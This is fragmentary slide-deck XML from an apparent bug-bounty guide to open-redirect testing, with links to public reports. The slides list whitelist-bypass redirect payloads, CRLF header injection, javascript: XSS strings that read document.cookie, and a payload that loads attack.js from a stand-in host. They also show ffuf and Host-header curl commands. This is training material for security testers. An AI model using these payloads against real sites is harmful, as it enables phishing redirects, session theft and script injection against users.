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Lato"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black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-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8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45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePr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swald-bold.fntdata"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswal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8ff6837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8ff6837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6587484b_1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66587484b_1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f8ff683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f8ff683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f8ff683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f8ff683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73ab4c7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673ab4c7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673ab4c7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673ab4c7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66587484b_1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66587484b_1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89815a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89815a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66587484b_1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66587484b_1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66587484b_1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66587484b_1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66587484b_1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66587484b_1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f8ff683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f8ff683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8997e46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8997e4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673ab4c7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673ab4c7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700277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b700277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f8ff683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f8ff683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66587484b_1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66587484b_1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f8ff6837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f8ff683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66587484b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66587484b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66587484b_1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66587484b_1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66587484b_1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66587484b_1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f8ff68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f8ff68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8ff683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8ff683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b66587484b_1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b66587484b_1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66587484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66587484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66587484b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66587484b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6587484b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66587484b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66587484b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66587484b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66587484b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66587484b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6587484b_1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66587484b_1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6587484b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6587484b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hackerone.com/reports/246897" TargetMode="External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twitter.com/LooseSecurity/status/1164579967184887809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twitter.com/sillydadddy/status/1264753667904700417" TargetMode="External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twitter.com/shadow_clay/status/1251532952254640128" TargetMode="External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twitter.com/intigriti/status/1265247965037428741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deepsec.net/docs/Slides/2016/Go_Hack_Yourself..._Frans_Rosen.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2020/07/07/an-offensive-guide-to-the-authorization-code-grant/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i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/kunalp94/status/1195321932612169728" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://elmahdi.tistory.com/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medium.com/@malcolmx0x/three-cases-three-open-redirect-bypasses-887bda60b38c" TargetMode="External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twitter.com/h4x0r_dz/status/1353148913755320320" TargetMode="External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90560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5716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712979" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/763058" TargetMode="External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omespino.com/write-up-google-bug-bounty-lfi-on-production-servers-in-redacted-google-com-13337-usd/" TargetMode="External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29940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hyperlink" Target="https://twitter.com/intigriti/status/1253676624488398850" TargetMode="External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hyperlink" Target="https://twitter.com/samwcyo/status/1246997498981494784" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=f1XCvDCO22U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esseClarkND/abnormalizer" TargetMode="External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s://www.gremwell.com/firefox-xss-302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hahwul.com/2020/10/03/forcing-http-redirect-xss/" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://twitter.com/intigriti/status/1309104069643055111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29368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twitter.com/zseano/status/1309117175379132418" TargetMode="External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hyperlink" Target="https://medium.com/@0xrishabh/open-redirect-to-account-takeover-e939006a9f24" TargetMode="External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twitter.com/d0nutptr/status/1216279678672982016" TargetMode="External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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/1271799655186206722" TargetMode="External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blog.blackfan.ru/2017/09/devtwittercom-xss.html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hackerone.com/reports/330008" TargetMode="External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hyperlink" Target="http://blog.volema.com/nginx-insecurities.html#.YALNB3VfjoE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9.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/sin_khe/status/1247157193876668416" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/97292" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/66386" TargetMode="External"/><Relationship Id="rId1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twitter.com/ihebhamad514/status/1233810045684592645" TargetMode="External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19684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s://hackerone.com/reports/30905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twitter.com/pwnydaemons/%20status/1296745261964894208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678175" y="1915350"/>
            <a:ext cx="3980400" cy="149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2B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>HTTP/1.1 302 Found</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="16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2B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Location: https://dev.company.com/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="16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2B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Content-Length: Number</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="16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2B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Content-Type: text/html;</a:t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3868050" y="339175"/>
            <a:ext cx="53502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Redirection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Response</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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https://me.com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https://me.com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@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com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.me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> //.@.me.com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2" name="Google Shape;332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@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use e.g.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http:http:me.com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http:/me%252ecom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///www.company.com@evil.com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http:http:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com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8" name="Google Shape;358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0" name="Google Shape;360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https://apiAcompany.com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https://api.companyAcom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https://api.company.communication As Value Of Redirect URL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Patterns To Bypass The Whitelist In Redirect URL Parameter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258050" y="20390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0" y="2093400"/>
            <a:ext cx="510550" cy="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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="2458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7" name="Google Shape;377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625" y="2925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3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313" y="332553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https://me.com\@www.company.com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https://company.com\@me.com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https://me.com/.www.company.com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https://company.com/ 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https://me.com\[company.com]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me.com%ff@company.com%2F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me.com%bf:@company.com%2F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me.com%252f@company.com%2F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//me.com%0a%2523.company.com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me.com://company.com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androideeplink://me.com\@company.com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androideeplink://a@company.com:@me.com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https://company.com.me.com\@company.com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company.com%252f@me.com%2fpath%2f%3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//me.com:%252525252f@company.com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company.com.evil.com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evil.com#company.com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evil.com?company.com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/%09/me.com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me.com%09company.com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/\me.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="950">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill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000" y="2472438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258050" y="3664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725" y="37318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If There Is Redirection Based On Value Of Parameter Try To Use e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com\\.company.com</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:b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@me.com\\@company.com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me.com%E3%80%82.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Open Redirection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389" name="Google Shape;389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 sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@me.com\\@company.com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</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> //me.com\@company.com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1" name="Google Shape;401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 sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//me.com\@company.com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02" name="Google Shape;402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3" name="Google Shape;403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7" name="Google Shape;4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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://comapny.com///me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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https://company.com///me.com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5" name="Google Shape;415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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://comapny.com/%2Fme%252Ecom</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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https://company.com/%2Fme%252Ecom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26" name="Google Shape;426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7" name="Google Shape;427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9" name="Google Shape;4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me.com%0dpany.com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company.com%09.me.com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37" name="Google Shape;437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https://me.com%0dpany.com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1" name="Google Shape;4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5" name="Google Shape;44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25" y="2906113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- If There Is Domain e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://corp.int.company.com  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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redirect You To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://corp.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Then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Redirect You To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.company.com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  So You Will </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUZZ https://corp.company.com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- If https://corp.int.company.com Doesn't Host Any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Others Domains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So You Will </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUZZ https://corp.int.company.com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7" name="Google Shape;217;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3399550" y="4229750"/>
            <a:ext cx="4446600" cy="203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</a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ffuf -w wordlist.txt -u https://corp.company.com/FUZZ -fc 302 -replay-proxy http://127.0.0.1:8080</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3399550" y="4482575"/>
            <a:ext cx="4446600" cy="203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</a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ffuf -w wordlist.txt -u https://corp.int.company.com/FUZZ -fc 302 -replay-proxy http://127.0.0.1:8080</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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Right-To-Left Override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https://www.%E2%80%AEcompany.com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Redirect To https://www.moc.ynapmoc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51" name="Google Shape;451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https://www.%E2%80%AEcompany.com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3" name="Google Shape;453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5" name="Google Shape;4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3" name="Google Shape;463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5" name="Google Shape;465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Use IDN Homograph Attack e.g. https://me.comğ.company.com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https://me.com\udfff@company.com As Value Of Redirect URL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6" name="Google Shape;4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8" name="Google Shape;4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1" name="Google Shape;47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3" name="Google Shape;473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9" name="Google Shape;479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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354600" y="36969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company.com " Name Of Company To Abnormlize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1" name="Google Shape;481;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354600" y="41043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| tee -a out.txt " Save Output To File out.txt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2" name="Google Shape;482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3" name="Google Shape;483;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354600" y="30334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abnormalizer.py company.com | tee -a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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Use Tools e.g.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abnormalizer.py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To Make List Of Payloads To Use In IDN Homograph Attack</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="485" name="Google Shape;48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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://216.58.214.206/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http://216.58.214.206/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http://216.58.214.206/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Redirect To https://www.google.com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91" name="Google Shape;491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https://216.58.214.206/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3" name="Google Shape;493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5" name="Google Shape;4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2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7" name="Google Shape;49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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ws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wss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ws://www.company.com%0A%0A&lt;script&gt;alert(1)&lt;/script&gt;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3" name="Google Shape;503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ws://company.com%0A%0A&lt;script&gt;alert(1)&lt;/script&gt;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04" name="Google Shape;504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5" name="Google Shape;505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07" name="Google Shape;5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9" name="Google Shape;50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1" name="Google Shape;511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javascript:alert(1);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17" name="Google Shape;517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r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:alert(1)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18" name="Google Shape;518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9" name="Google Shape;519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1" name="Google Shape;5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3" name="Google Shape;52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9" name="Google Shape;529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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\n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\r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\t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x01-\x20</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Between Javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. java\nscript:alert(1)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32" name="Google Shape;5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4" name="Google Shape;53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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JAVASCRIPT:alert%09(document.domain)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41" name="Google Shape;541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JAVASCRIPT:alert%09(document.domain)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3" name="Google Shape;543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5" name="Google Shape;5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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\u006A\u0061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\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)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53" name="Google Shape;553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\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)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54" name="Google Shape;554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5" name="Google Shape;555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7" name="Google Shape;5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9" name="Google Shape;5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Based On Value Of Parameter Try To Use e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:$.getScript`https://me.com/attack.js`</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get HTTP Interaction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65" name="Google Shape;565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/redirection?url=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	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:$.getScript`https://me.com/attack.js`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66" name="Google Shape;566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7" name="Google Shape;567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9" name="Google Shape;56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1" name="Google Shape;57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- If There Is Domain e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://corp.int.company.com  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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point To I.P.v.4 Redirect To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https://corp.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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But </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://corp.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Doesn't Point To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Anything e.g. A , AAAA , CNAME Record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So Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set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corp.company.com As </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host Header</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:b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3399550" y="3981375"/>
            <a:ext cx="4446600" cy="523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</a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl -ik https://I.P.v.4 -H "HOST: corp.company.com"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29" name="Google Shape;229;p42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25" y="29253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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50225" y="4634175"/>
            <a:ext cx="9252600" cy="540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78" name="Google Shape;578;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4686038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79" name="Google Shape;57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575" y="47219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6" name="Google Shape;586;p70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87" name="Google Shape;58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On The Root Domain Try To Use Payloads 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/x:1/:///%01javascript:alert(document.cookie)/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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/x:1/:///%01javascript:alert(document.cookie)/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On The Root Domain Try To Use CRLF Payloads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%0d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%0a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%0d%0a e.g. %0d%0aSet-Cookie: Value </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get CRLF OR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24" y="3493575"/>
            <a:ext cx="503200" cy="3706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6000" y="2675525"/>
            <a:ext cx="4973699" cy="20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4025" y="433745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On The Root Domain Try To Add </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..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%2e%2e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%20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%09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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../..%20me.com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On The Root Domain Try To Use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https://www.company.com///;@me.com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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//;@me.com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4" name="Google Shape;28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Redirection On The Root Domain Try To Use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https://www.company.com/@me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Open Redirection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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@me.com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Search</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> About </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=http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=https</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Request Headers AND </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Status Code 3xx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Figure Out Where I Can Inject Open Redirection Payloads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1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